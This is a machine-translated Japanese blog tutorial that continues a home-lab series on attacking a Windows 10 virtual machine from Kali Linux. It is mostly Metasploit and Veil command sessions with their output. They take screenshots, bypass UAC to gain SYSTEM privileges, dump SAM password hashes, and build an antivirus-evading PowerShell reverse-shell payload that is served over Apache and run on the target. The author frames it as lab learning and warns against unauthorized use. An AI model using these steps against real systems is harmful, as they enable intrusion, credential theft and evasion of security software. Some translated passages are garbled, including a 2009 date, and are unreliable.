Continued, first Windows 10 hacking
Introduction
It is the 15th day of the Advent calendar of PRO Co., Ltd. Sorry for the late posting ...! !! !!
This article is a continuation of "First Windows 10 Hacking". I will try to make you think "Is it possible to do this?" Even if you look at it alone, but if you want to try it yourself, Previous article / items / 1d035b0413ab60674ccb), please also.
things to do
Last time, I tried to attack and remotely control the target environment (Windows10) created by VM from the attack environment (Kali Linux) using a tool called Metasploit Framework (hereinafter, Metasploit). This time, let's experience some of the things to do after breaking into the target device.
--Taking screenshots --Acquisition of SYSTEM authority --Get the Windows password hash --Avoid antivirus virus detection
Here, it is assumed that the Meterpreter session has been established in advance (Previous article "Allowing the target terminal to be controlled from the attacking terminal" / 1d035b0413ab60674ccb #% E6% 94% BB% E6% 92% 83% E7% AB% AF% E6% 9C% AB% E3% 81% 8B% E3% 82% 89% E3% 82% BF% E3% 83% BC% E3% 82% B2% E3% 83% 83% E3% 83% 88% E7% AB% AF% E6% 9C% AB% E3% 82% 92% E5% 88% B6% E5% BE% A1% See E3% 81% A7% E3% 81% 8D% E3% 82% 8B% E3% 82% 88% E3% 81% 86% E3% 81% AB% E3% 81% 99% E3% 82% 8B)) ..
Caution!
This article is not intended to recommend unauthorized access. ** Never do what you introduce in someone else's environment **
Verification environment
Same as Last time.
--Host OS: macOS 10.15.2 Beta --Guest OS --Attack terminal: Kali Linux 5.3.0-kali2-amd64 --Target terminal: Windows 10 --Virtualization software: VirtualBox 6.0.14 r133895 (Qt5.6.3)
| Terminal | IP address |
|---|---|
| Kali Linux (attack terminal) | 10.0.0.2 |
| Windows10 (target terminal) | 10.0.0.102 |
Take a screenshot
Enter the following command to take a picture of the screen currently displayed on the target terminal.
meterpreter > screenshot
Screenshot saved to: /root/ImgBawmm.jpeg
The red frame is a screenshot of the target device.
Get SYSTEM authority
If you do not have administrator privileges, various operations will be restricted, so you should elevate the privileges.
Attempts to elevate privileges with the getsystem command (failure)
Check the current permissions.
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa
Meterpreter provides a getsystem command that attempts to elevate to SYSTEM privileges, but fails because the intruding user has low privileges.
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
Try a module that bypasses UAC functionality
The getsystem command failed because it was blocked by the Windows User Account Control (UAC) feature, and it looks for a module to work around it.
First, bring the Meterpreter prompt to the background and back to the msf prompt.
meterpreter > background
[*] Backgrounding session 1..
msf5 exploit(multi/handler) >
Check the connected session
msf5 exploit(multi/handler) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:50763 (10.0.0.102)
Search for modules with the keyword "bypassuac".
msf5 exploit(multi/handler) > search bypassuac
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass
1 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
2 exploit/windows/local/bypassuac_dotnet_profiler 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via dot net profiler)
3 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
4 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key)
5 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection)
6 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
7 exploit/windows/local/bypassuac_sdclt 2017-03-17 excellent Yes Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
9 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack)
10 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
11 exploit/windows/local/bypassuac_windows_store_filesys 2019-08-22 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
12 exploit/windows/local/bypassuac_windows_store_reg 2019-02-19 manual Yes Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
Use the following modules to send Exploits through established sessions.
8 exploit/windows/local/bypassuac_silentcleanup 2019-02-24 excellent No Windows Escalate UAC Protection Bypass (Via SilentCleanup)
msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac_silentcleanup <----Use input module
msf5 exploit(windows/local/bypassuac_silentcleanup) > show targets <----input
Exploit targets:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > set TARGET 0 <----Input target set
TARGET => 0
msf5 exploit(windows/local/bypassuac_silentcleanup) > set SESSION 1 <----Input session set
SESSION => 1
msf5 exploit(windows/local/bypassuac_silentcleanup) > set payload windows/x64/meterpreter/reverse_tcp <----Set the payload to be input
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_silentcleanup) > set LHOST 10.0.0.2 <----Input: Set the standby host
LHOST => 10.0.0.2
msf5 exploit(windows/local/bypassuac_silentcleanup) > show options <----Input setting confirmation
Module options (exploit/windows/local/bypassuac_silentcleanup):
Name Current Setting Required Description
---- --------------- -------- -----------
PSH_PATH %WINDIR%\System32\WindowsPowershell\v1.0\powershell.exe yes The path to the Powershell binary.
SESSION 1 yes The session to run this module on.
SLEEPTIME 0 no The time (ms) to sleep before running SilentCleanup
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.0.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows
msf5 exploit(windows/local/bypassuac_silentcleanup) > exploit <----Input execution
[*] Started reverse TCP handler on 10.0.0.2:4444
[+] Part of Administrators group! Continuing...
[*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:50983) at 2019-12-15 18:17:57 +0900
meterpreter > <--Success when the meterpreter prompt is returned
Try to elevate authority again with getsystem (success)
meterpreter > getuid
Server username: DESKTOP-4V3PT8F\arakawa <--Normal user before execution
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM <--SYSTEM authority
You now have SYSTEM privileges.
Get the password hash
One of the things you can do after you have the SYSTEM privilege is to get a password hash. The obtained hash is mainly used for password analysis of Windows. Password analysis will not be dealt with this time.
If it is a local account, the SAM database ("C: \ Windows \ System32 \ config \ SAM" file) manages logon authentication, and the password is recorded in hash format.
In Metasploit, you can get the password hash with the run hashdump command, but you will get an error if you do not have SYSTEM privileges.
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d1584c448032fe34d1e8e158d04561ed...
/usr/share/metasploit-framework/lib/rex/script/base.rb:134: warning: constant OpenSSL::Cipher::Cipher is deprecated
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
<Password hash>
It is output in the
Avoid antivirus
Establish a Meterpreter session by avoiding virus detection by antivirus.
Create a payload that avoids antivirus in Veil
Install Veil Framework
Veil Framwwork (Veil) A group of tools that generate payloads that evade antivirus.
Veil is not available on Kali Linux, so install it separately.
root@kali:~# apt install veil-evasion
Launch Veil
Execute the following command with GUI login to Kali. Along the way, you will be asked if you want to install the dependencies, so select "s" (install in silent mode).
root@kali:~# veil
===============================================================================
Veil | [Version]: 3.1.12
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
exit Completely exit Veil
info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool
Veil>:
- If you execute it while logged in to SSH, the dialog will fail and an error will occur when installing Wine.
[!] ERROR #2-3: Can't find the WINE profile for Ruby v1.8.7 (/var/lib/veil/wine//drive_c/Ruby187/bin/ruby.exe). Run: /usr/share/veil/config/setup.sh --force --silent
Create payload with Veil
Update Veil
Virus detection and evasion technologies are constantly being updated, so keep them updated to increase the success rate of evasion as much as possible.
Veil>: update
Hit:1 http://ftp.jaist.ac.jp/pub/Linux/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
veil is already the newest version (3.1.12-0kali1).
veil set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 203 not upgraded.
Veil has checked for updates, press enter to continue
Select a tool
Two tools, Evasion and Ordnance, have been loaded, but I choose Evasion because it avoids virus detection.
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Veil-Evasion Menu
41 payloads loaded
Available Commands:
back Go to Veil's main menu
checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload
Select payload
Select "powershell / meterpreter / rev_tcp.py" which is the reverse shell for Windows from the list.
Veil/Evasion>: list <--input
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[*] Available Payloads:
1) autoit/shellcode_inject/flat.py
2) auxiliary/coldwar_wrapper.py
<Omitted>
22) powershell/meterpreter/rev_tcp.py
<Omitted>
41) ruby/shellcode_inject/flat.py
Veil/Evasion>: use 22 <--input
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Name: Pure PowerShell Reverse TCP Stager
Language: powershell
Rating: Excellent
Description: pure windows/meterpreter/reverse_tcp stager, no
shellcode
Payload: powershell/meterpreter/rev_tcp selected
Required Options:
Name Value Description
---- ----- -----------
BADMACS FALSE Checks for known bad mac addresses
DOMAIN X Optional: Required internal domain
HOSTNAME X Optional: Required system hostname
LHOST IP of the Metasploit handler
LPORT 4444 Port of the Metasploit handler
MINBROWSERS FALSE Minimum of 2 browsers
MINPROCESSES X Minimum number of processes running
MINRAM FALSE Require a minimum of 3 gigs of RAM
PROCESSORS X Optional: Minimum number of processors
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Window pops up prior to payload
UTCCHECK FALSE Check that system isn't using UTC time zone
VIRTUALPROC FALSE Check for known VM processes
Available Commands:
back Go back to Veil-Evasion
exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option
[powershell/meterpreter/rev_tcp>>]: set LHOST 10.0.0.2 <--Input Specify the attack terminal as the connection destination
[powershell/meterpreter/rev_tcp>>]: options <--Input setting confirmation
<Omitted>
Payload creation
Create with the generate command.
[powershell/meterpreter/rev_tcp>>]: generate <--input
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
[>] Please enter the base name for output files (default is payload): evil3 <--Specify the input payload name
<Omitted>
Exit Veil with the exit command and copy the payload you created to your desktop.
Veil/Evasion>: exit
root@kali:~# cp /var/lib/veil/output/source/evil3.bat /root/Desktop
Avoid real-time protection of Windows Defender
In the payload created by Metasploit, if Windows real-time protection is not disabled, it will be detected at download time and run time and the session cannot be established, but the payload created here can be downloaded and executed without being detected. (As of December 2009).
Allow the payload to be downloaded externally
Place the created payload in a folder that can be downloaded from the outside, and put it in the reverse shell standby state with meterpreter. Specify the payload as "windows / meterpreter / reverse_tcp".
root@kali:~# cp /root/Desktop/evil3.bat /var/www/html/share/
root@kali:~# service apache2 restart
root@kali:~# msfconsole
<Abbreviation>
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.0.0.2
LHOST => 10.0.0.2
msf5 exploit(multi/handler) > exploit
Download payload
Download evil3.bat on the target device. It is not detected as a virus at this point.
Run payload
evil3.bat Double-click to display a warning screen, but click Execute from the detailed information.
If there is a reaction on the Kali side and the Meterpreter prompt is returned, it means that the session was established without being detected. If you do not receive a prompt, it may be blocked by some function of your security software.
Finally
This time, I had a hard time getting the SYSTEM authority, because the session was not established properly and veil did not start. Basically, it is prepared so that you can do anything with one command, and I thought it was easy, but if you do not understand the contents well, I feel that it has become difficult to deal with things that go wrong. It's scary that even such a person can do it relatively easily.
reference
[IPUSIRON "How to make a hacking lab: hacker experience learning in a virtual environment" Shoeisha (amazon)](https://www.amazon.co.jp/%E3%83%8F%E3%83%83%E3%82 % AD% E3% 83% B3% E3% 82% B0% E3% 83% BB% E3% 83% A9% E3% 83% 9C% E3% 81% AE% E3% 81% A4% E3% 81% 8F % E3% 82% 8A% E3% 81% 8B% E3% 81% 9F-% E4% BB% AE% E6% 83% B3% E7% 92% B0% E5% A2% 83% E3% 81% AB% E3% 81% 8A% E3% 81% 91% E3% 82% 8B% E3% 83% 8F% E3% 83% 83% E3% 82% AB% E3% 83% BC% E4% BD% 93% E9% A8% 93% E5% AD% A6% E7% BF% 92-IPUSIRON-ebook / dp / B07JJKLZNW) "How to make a hacking lab" support site FAQ for "hacker experience learning in a virtual environment"